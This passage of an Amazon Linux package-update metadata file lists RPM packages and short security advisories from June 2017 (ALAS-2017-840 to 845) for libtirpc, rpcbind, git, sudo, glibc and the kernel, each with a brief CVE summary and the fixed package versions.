arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93" 
version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.17-1.63.amzn1.i686.rpm</filename></package><package 
name="postgresql93-plpython26" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.12" release="1.68.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql94-docs-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.12" 
release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package 
name="postgresql95-server" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.7-1.72.amzn1.i686.rpm</filename></package><package 
name="postgresql95-plperl" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.7-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-840</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-840: important priority package update for libtirpc</title><issued date="2017-06-06 17:00:00" /><updated date="2017-06-06 22:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8779:
It was found that due to the way rpcbind uses libtirpc (libntirpc), a memory leak can occur when parsing specially crafted XDR messages. An attacker sending thousands of messages to rpcbind could cause its memory usage to grow without bound, eventually causing it to be terminated by the OOM killer.
1448124:
CVE-2017-8779 rpcbind, libtirpc, libntirpc: Memory leak when failing to parse XDR strings or bytearrays
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779" title="" id="CVE-2017-8779" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtirpc-debuginfo" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-debuginfo-0.2.4-0.8.14.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-devel-0.2.4-0.8.14.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-0.2.4-0.8.14.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-0.2.4-0.8.14.amzn1.i686.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-devel-0.2.4-0.8.14.amzn1.i686.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-debuginfo-0.2.4-0.8.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-841</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-841: important priority package update for rpcbind</title><issued date="2017-06-06 17:03:00" /><updated date="2017-06-06 22:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8779:
It was found that due to the way rpcbind uses libtirpc (libntirpc), a memory leak can occur when parsing specially crafted XDR messages. An attacker sending thousands of messages to rpcbind could cause its memory usage to grow without bound, eventually causing it to be terminated by the OOM killer.
1448124:
CVE-2017-8779 rpcbind, libtirpc, libntirpc: Memory leak when failing to parse XDR strings or bytearrays
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779" title="" id="CVE-2017-8779" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1267.html" title="" id="RHSA-2017:1267" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpcbind-debuginfo" version="0.2.0" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-debuginfo-0.2.0-13.9.amzn1.x86_64.rpm</filename></package><package name="rpcbind" version="0.2.0" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-0.2.0-13.9.amzn1.x86_64.rpm</filename></package><package name="rpcbind-debuginfo" version="0.2.0" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-debuginfo-0.2.0-13.9.amzn1.i686.rpm</filename></package><package name="rpcbind" version="0.2.0" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-0.2.0-13.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-842</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-842: medium priority package update for git</title><issued date="2017-06-06 17:07:00" /><updated date="2017-06-06 22:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8386:
A flaw was found in the way git-shell handled command-line options for the restricted set of git-shell commands. A remote authenticated attacker could use this flaw to bypass git-shell restrictions, to view and manipulate files, by abusing the instance of the less command launched using crafted command-line options.
1450407:
CVE-2017-8386 git: Escape out of git-shell
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8386" title="" id="CVE-2017-8386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Git-SVN" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.7.5" release="1.49.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/git-debuginfo-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.7.5-1.49.amzn1.i686.rpm</filename></package><package name="git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.7.5-1.49.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.7.5-1.49.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.7.5-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-843</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-843: important priority package update for sudo</title><issued date="2017-06-06 17:08:00" /><updated date="2017-06-06 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000367:
A flaw was found in the way sudo parsed tty information from the process status file in the proc filesystem. A local user with privileges to execute commands via sudo could use this flaw to escalate their privileges to root.
1453074:
CVE-2017-1000367 sudo: Privilege escalation via improper get_process_ttyname() parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000367" title="" id="CVE-2017-1000367" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1382.html" title="" id="RHSA-2017:1382" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-28.25.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-28.25.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-28.25.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-28.25.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-28.25.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-28.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-844</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-844: critical priority package update for glibc</title><issued date="2017-06-19 08:51:00" /><updated date="2017-06-19 08:51:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000366:
Glibc contains a vulnerability that allows specially crafted LD_LIBRARY_PATH values to manipulate the heap/stack, causing them to alias, potentially resulting in arbitrary code execution. Note that additional hardening changes have been made to glibc to prevent manipulation of stack and heap memory; because those issues are not directly exploitable, they have not been assigned a CVE. This affects glibc 2.25 and earlier.
CVE-2017-1000366
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000366" title="" id="CVE-2017-1000366" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-utils" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-static" 
version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-157.170.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-157.170.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-845</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-845: critical priority package update for kernel</title><issued date="2017-06-19 08:58:00" /><updated date="2017-06-19 08:58:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000371:
The offset2lib patch as used by the Linux kernel contains a vulnerability. If RLIMIT_STACK is set to RLIMIT_INFINITY and 1 gigabyte of memory is allocated (the maximum under the 1/4 restriction), the stack will be grown down to 0x80000000; because the PIE binary is mapped above 0x80000000, the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365.
CVE-2017-1000371
CVE-2017-1000364:
An issue was discovered in the size of the stack guard page on Linux: a 4k stack guard page is not sufficiently large and can be jumped over. This affects Linux kernel versions 4.11.5 and earlier (the stack guard page was introduced in 2010).
CVE-2017-1000364
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000364" title="" id="CVE-2017-1000364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000371" title="" id="CVE-2017-1000371" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package 
name="kernel-tools-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.27" release="14.33.amzn1" 
